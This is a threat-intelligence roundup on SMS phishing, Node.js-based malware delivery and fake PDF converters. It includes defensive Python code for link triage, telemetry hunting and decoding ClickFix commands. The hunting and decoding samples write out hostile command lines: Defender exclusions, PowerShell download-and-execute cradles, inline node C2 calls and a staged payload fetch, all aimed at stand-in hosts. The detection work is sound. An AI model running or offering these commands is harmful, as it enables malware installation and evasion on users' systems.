CTI Roundup: SMS Phishing, Node.js, and Fake PDF Converters
Threat actors continue to exploit SMS using social engineering, Node.js misuse results in malware and malicious payload delivery, and fake PDF converters help deliver malware
This week, the Tanium CTI team reviews new findings from Cofense about the ongoing use of SMS-based phishing to target organizations and steal credentials. Next up, the team looks at several campaigns that leverage Node.js to deliver malware and other harmful payloads. Finally, we explore how deceptive file converters are being used to deliver malware.
Threat actors continue to exploit SMS using social engineering
Cofense reports ongoing SMS-based phishing targeting organizations to steal credentials.
In its investigation, Cofense observed an uptick in these attacks, which manufacture a sense of urgency or fear to push recipients into acting before they stop to think.
[Read also: What is social engineering in cybersecurity? A comprehensive guide]
What do the SMS messages say?
These attacks start with an SMS message sent to an intended recipient. The messages are crafted to create a sense of urgency or fear, using phrases like “attention” and “please view changes.”
According to Cofense, the threat actor included the phrase, “if this was not you, please log in to make a ticket,” to elicit an action from the recipient.
How does the malicious site work?
If the recipient taps the link in the SMS message, the request is first routed through a Google redirect so the URL looks more legitimate. From there, the victim must click one more link to reach the final landing page.
The final landing page is a phishing page that impersonates ServiceNow’s login page and asks the user to enter their credentials. If credentials are entered, the victim is shown a fake multifactor authentication (MFA) prompt, so the actor captures both the password and whatever MFA response the victim supplies, which is enough to complete a login as that user.
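The two lookalike checks an analyst would run on a link like this, as an added example (not Cofense's or CloudSEK's code): unwrap the redirect hop without touching the network, then ask whether the final host impersonates a brand while not actually being that brand's domain. It covers both the ServiceNow impersonation described here and the pdfcandy.com mimicry covered later in this roundup. The `/url?q=` redirect shape, the `.example` sample hosts, and the two-label "registrable domain" shortcut are assumptions made for the example.

```python
"""Triage a link delivered by SMS: unwrap a Google-style redirect and check
whether the final host impersonates a brand. Added example, not Cofense's or
CloudSEK's code; sample URLs below are constructed (reserved .example TLD)."""
from urllib.parse import urlparse, parse_qs

# Brand keyword -> domains that are legitimately that brand. The two brands are
# the ones this roundup describes being impersonated (ServiceNow, PDF Candy).
IMPERSONATED_BRANDS = {
    "servicenow": {"servicenow.com", "service-now.com"},
    "pdfcandy": {"pdfcandy.com"},
}

# Redirectors that carry the real destination in a query parameter. Assumption:
# the Google hop in the campaign used the common /url?q=<target> form.
REDIRECTORS = {"www.google.com": ("/url", "q"), "google.com": ("/url", "q")}


def unwrap_redirect(url, max_hops=5):
    """Follow redirector query parameters (no network access) and return every hop."""
    hops = [url]
    for _ in range(max_hops):
        parsed = urlparse(hops[-1])
        entry = REDIRECTORS.get(parsed.netloc.lower())
        if entry is None or parsed.path != entry[0]:
            break
        target = parse_qs(parsed.query).get(entry[1], [""])[0]
        if not target.lower().startswith(("http://", "https://")):
            break
        hops.append(target)
    return hops


def registrable_domain(host):
    """Naive: last two labels. Enough for the sample data; use a public-suffix list in production."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def lookalike_brand(host):
    """Return the brand a host impersonates, or None if it is unrelated or the real site."""
    host = host.lower()
    domain = registrable_domain(host)
    for brand, legit_domains in IMPERSONATED_BRANDS.items():
        if domain in legit_domains:
            return None          # genuinely the brand's own domain
        if brand in host.replace("-", ""):
            return brand         # brand name embedded in an unrelated domain
    return None


def triage_sms_link(url):
    hops = unwrap_redirect(url)
    final_host = urlparse(hops[-1]).netloc.lower()
    brand = lookalike_brand(final_host)
    return {
        "redirects": len(hops) - 1,
        "final_host": final_host,
        "impersonates": brand,
        "suspicious": brand is not None or len(hops) > 1,
    }


# Constructed sample: an SMS link bounced through Google to a ServiceNow lookalike.
SAMPLE_SMS_LINK = ("https://www.google.com/url?q="
                   "https%3A%2F%2Fservicenow-ticket.example%2Flogin&sa=D")

if __name__ == "__main__":
    print(triage_sms_link(SAMPLE_SMS_LINK))
    print(triage_sms_link("https://acme.service-now.com/login"))
```

The redirect is counted as a signal on its own: a legitimate ServiceNow notification does not need to bounce a user through a search engine to reach the login page, and a brand name that appears anywhere in a host other than the brand's own registrable domain (including as a subdomain of something else) is treated as impersonation.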
[Read also: Is multifactor authentication (MFA) living up to its hype?]
Analyst comments from Tanium’s Cyber Threat Intelligence team
This research is a reminder to be on the lookout for phishing not only in email, but in SMS messages as well.
Many signs are the same, including the false sense of urgency, the enticement to click on something, and the unexpected message. In both cases, the actor will often try to establish a sense of trust and play on human emotions.
Node.js misuse results in malware and malicious payload delivery
Microsoft has identified several campaigns that leverage Node.js to deliver malware and other malicious payloads.
Most recently, it detected a malvertising attack still in operation today that utilizes Node.js as part of a cryptocurrency trading campaign. The campaign aims to deceive users into downloading a malicious installer disguised as legitimate software.
What is Node.js?
Node.js is an open-source JavaScript runtime environment that executes JavaScript code outside a web browser. Developers often use Node.js for server-side scripting and to create scalable network applications.
Understanding malvertising
Microsoft observed in its customer environments that delivering Node.js-related malware via malvertising remains popular. These malvertisements lure victims to visit websites where they will download and install malware disguised as legitimate software.
In the cryptocurrency campaign, the ads were designed to look like they were from a legitimate trading platform, aiming to deceive victims into downloading a harmful installer. This installer, however, contained a malicious DLL intended to collect system information and maintain persistence.
[Read also: I almost fell for this online scam. Why even tech pros can be taken]
When launched, the Wix-built package installer loads a DLL that gathers information through a WMI query. It also creates a scheduled PowerShell command task to ensure persistence. The victim is also presented with a decoy window displaying the legitimate website.
How the malware evades detection
The scheduled task runs PowerShell commands that add Microsoft Defender exclusions for the PowerShell process and the current directory, so subsequent PowerShell executions from that location are neither scanned nor alerted on.
How does this type of malware gather and exfiltrate data?
A PowerShell command runs to obtain and run scripts from remote URLs. These scripts will gather Windows information, BIOS information, system information, and OS data.
According to Microsoft, the data is “structured into a nested hash table, converted into JSON format, and then sent using HTTP POST to the attacker’s command-and-control (C2) server.”
An additional PowerShell script runs to download and extract an archive file from the C2. It then turns off proxy settings and launches a JavaScript file from the archive.
How is Node.js used to deliver the malware?
The Node.js executable, previously downloaded from the archive, launches the JavaScript file. This loads library modules, establishes connections, and adds certificates to the device.
Microsoft has also seen an emerging technique in Node.js campaigns: inline JavaScript execution, in which the malicious script is passed straight to the Node.js binary rather than being written to disk as a file first.
Microsoft observed one instance of this in a ClickFix attack, where the user is tricked into copying, pasting, and running malicious code. That code downloaded multiple components, including the Node.js binary. A script then used the Node.js runtime to execute JavaScript supplied on the command line (the runtime supports this through its -e flag) instead of loading it from a file.
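The chain just described leaves a recognizable trail in process-creation telemetry: a scheduled task whose action is PowerShell, a command line adding Defender exclusions, a download cradle piped into in-memory execution, and node.exe running from a user-writable directory with inline JavaScript. The following is an added hunting example (not Microsoft's published queries) over constructed events in a cut-down Sysmon-style schema; the field names, the "standard" Node.js install directories, and the 203.0.113.10 address are assumptions made for the example.

```python
"""Hunt for the Node.js delivery chain described above in process-creation
telemetry. Added example, not Microsoft's published hunting queries. Events are
constructed; the flat image/cmdline/parent schema is an assumption (a cut-down
Sysmon Event ID 1), and 203.0.113.10 is a documentation-reserved address."""
import re

# Antivirus exclusions added from the command line (Defender's Add-MpPreference).
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s.*-exclusion(?:path|process|extension)", re.I)
# A scheduled task whose action is a PowerShell command.
SCHTASKS_POWERSHELL = re.compile(r"schtasks(?:\.exe)?\s.*/create\b.*powershell", re.I)
# Download cradle plus in-memory execution: fetch a script from a URL and run it.
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I)
INVOKE = re.compile(r"\biex\b|invoke-expression", re.I)
# Node.js given JavaScript on the command line instead of a file (node -e / --eval).
NODE_INLINE = re.compile(r'\bnode(?:\.exe)?"?\s+(?:-e|--eval)\b', re.I)
# Assumption to tune per estate: node.exe normally lives under these directories.
STANDARD_NODE_DIRS = ("c:\\program files\\nodejs\\", "c:\\program files (x86)\\nodejs\\")


def node_from_unusual_path(event):
    image = event["image"].lower()
    return image.endswith("\\node.exe") and not image.startswith(STANDARD_NODE_DIRS)


def evaluate(event):
    """Return the names of every rule the event trips, in a fixed order."""
    cmd = event["cmdline"]
    hits = []
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion_added")
    if SCHTASKS_POWERSHELL.search(cmd):
        hits.append("scheduled_task_runs_powershell")
    if DOWNLOAD_CRADLE.search(cmd) and INVOKE.search(cmd):
        hits.append("powershell_remote_script_execution")
    if NODE_INLINE.search(cmd):
        hits.append("node_inline_javascript")
    if node_from_unusual_path(event):
        hits.append("node_outside_install_dir")
    return hits


def hunt(events):
    """Map event index -> rule hits for every event that matched at least one rule."""
    findings = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample telemetry: three malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {   # installer's DLL registers a PowerShell task that adds AV exclusions
        "image": r"C:\Windows\System32\schtasks.exe",
        "parent": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r'schtasks.exe /create /f /tn "ChromeUpdater" /sc minute /mo 5 '
                   r'/tr "powershell.exe -w hidden -c Add-MpPreference -ExclusionProcess powershell.exe; '
                   r'Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Local\Temp"',
    },
    {   # the task fetches the next stage from the C2 and runs it in memory
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\svchost.exe",
        "cmdline": r'''powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/stage2.ps1')"''',
    },
    {   # dropped node.exe executing inline JavaScript from the temp directory
        "image": r"C:\Users\victim\AppData\Local\Temp\node.exe",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'''"C:\Users\victim\AppData\Local\Temp\node.exe" -e "require('https').get('https://203.0.113.10/c2')"''',
    },
    {   # benign: developer running a Node app from the standard install
        "image": r"C:\Program Files\nodejs\node.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": "node.exe server.js --port 8080",
    },
    {   # benign: listing scheduled tasks
        "image": r"C:\Windows\System32\schtasks.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": "schtasks.exe /query /fo LIST",
    },
]

if __name__ == "__main__":
    for index, hits in hunt(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["image"], hits)
```

Each rule on its own will fire on some legitimate administration; the value is in correlating them on one host within a short window, which is what the chain above produces. The node.exe path check is the one most worth tuning, since developer machines may legitimately carry Node.js in per-user locations.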
Analyst comments from Tanium’s Cyber Threat Intelligence team
This discovery doesn’t mean that actors have stopped using other popular scripting languages altogether; it means they are now occasionally running JavaScript outside the browser, through Node.js, alongside them.
Microsoft pointed out that if Node.js malware usage starts to gain popularity, this could indicate a shift in attacker preferences. This also serves as another example of how threat actors will seek out and leverage applications often used legitimately to blend in with normal activity.
As always, Microsoft has included recommendations, detections, and hunting queries to help organizations identify this threat.
Fake PDF converters help deliver malware
Following an FBI alert regarding malicious file converters that deliver malware, CloudSEK investigated the threat. Its report analyzes an attack involving a malicious document converter that poses as a trustworthy service but seeks to deliver the ArechClient2 malware.
CloudSEK identified multiple malicious file conversion websites that mimic “pdfcandy.com,” a legitimate file converter. These sites are nearly identical to the legitimate one and prompt visitors to upload a PDF file to be converted to a Word format.
How does the fake PDF converter malware work?
When a PDF is uploaded, the site first displays an animated loading sequence to trick the victim into thinking the file is being processed. Next, the site presents the victim with a CAPTCHA verification box. After completing this step, a dialog box asks the victim to copy, paste, and run code to trigger the malicious payload.
Additionally, researchers at CloudSEK decoded the command the victim is told to run and identified a redirection chain that obscures the malware delivery process. It works in two stages:
- The initial connection targets a URL disguised as a shortened link. This leads to a malicious URL that serves the malicious payload, “adobe.zip.”
- The malicious payload is hosted on an IP address previously flagged as malicious. A malicious executable, “audiobit[.]exe,” contained within the zip file, will trigger an attack chain that results in the execution of the ArechClient2 information stealer.
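Decoding the pasted command is the first step in reconstructing a chain like this, and the point of the redirection is that the first URL in the command is not the one that serves the payload. The following added example (not CloudSEK's tooling) peels the common layers of a ClickFix one-liner: the base64, UTF-16LE `-EncodedCommand` argument, then any `[Convert]::FromBase64String` payloads nested inside it, and collects the URLs, IP addresses, and file names found at every layer. The sample command is constructed inside the block; short.example and 203.0.113.10 are reserved documentation names, while adobe.zip and audiobit.exe are the file names the report cites. Because a real second stage would be fetched from the shortened link, the sample nests it as base64 instead so the example runs offline.

```python
"""Decode a ClickFix-style "copy and run this" PowerShell command and pull out
its delivery indicators. Added example, not CloudSEK's tooling. The command is
constructed in build_constructed_sample(): short.example and 203.0.113.10 are
reserved documentation names; adobe.zip and audiobit.exe are the file names
the report cites. A real stage 2 would be fetched from the shortened link; here
it is nested as base64 so the example runs offline."""
import base64
import re

# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# [Convert]::FromBase64String('...') nested payloads, assumed to decode as UTF-8 text
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
FILE_RE = re.compile(r"[\w.-]+\.(?:zip|exe|dll|js|ps1|bat|msi)\b", re.I)


def decode_layers(command, max_depth=4):
    """Return [command, decoded -enc script, nested payloads...], outermost first."""
    layers = [command]
    m = ENCODED_FLAG.search(command)
    if m:
        layers.append(base64.b64decode(m.group(1)).decode("utf-16le"))
    pending = layers[1:] or layers[:1]
    for _ in range(max_depth):
        found = []
        for text in pending:
            for blob in NESTED_B64.findall(text):
                try:
                    found.append(base64.b64decode(blob).decode("utf-8"))
                except (ValueError, UnicodeDecodeError):
                    continue   # binary or malformed blob; leave it for manual triage
        if not found:
            break
        layers.extend(found)
        pending = found
    return layers


def extract_indicators(command):
    """Collect URLs, IPv4 addresses and file names across every decoded layer."""
    layers = decode_layers(command)
    text = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL_RE.findall(text))),
        "ips": sorted(set(IPV4_RE.findall(text))),
        "files": sorted({f.lower() for f in FILE_RE.findall(text)}),
    }


def build_constructed_sample():
    """Constructed ClickFix command: shortened-link hop, then an IP-hosted archive."""
    stage2 = ("$u='https://203.0.113.10/adobe.zip';$d=\"$env:TEMP\\adobe.zip\";"
              "Invoke-WebRequest -Uri $u -OutFile $d;"
              "Expand-Archive -Path $d -DestinationPath $env:TEMP -Force;"
              "Start-Process \"$env:TEMP\\audiobit.exe\"")
    nested = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    stage1 = ("Invoke-WebRequest -Uri 'https://short.example/x9' -UseBasicParsing | Out-Null;"
              "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + nested + "')))")
    encoded = base64.b64encode(stage1.encode("utf-16le")).decode("ascii")
    return "powershell -w hidden -enc " + encoded


if __name__ == "__main__":
    for key, value in extract_indicators(build_constructed_sample()).items():
        print(key, value)
```

On a real incident the command itself comes from the victim's clipboard history, the Run dialog MRU, or the PowerShell script block log; the indicators it yields (the shortened link, the hosting IP, the archive and executable names) are what to pivot on in proxy and endpoint telemetry.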
Analyst comments from Tanium’s Cyber Threat Intelligence team
The attack relies on a significant amount of manual interaction from the victim, as it asks them to copy, paste, and run the malicious code. This technique is becoming increasingly popular, so it must have some level of success if actors continue to use it.
Educating about some of the telltale signs of this popular threat can easily be included in security awareness training for employees. CloudSEK also includes some recommendations for protection in its report that may be helpful.
[Read also: CISO success story: The best cure for boring cybersecurity training]
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.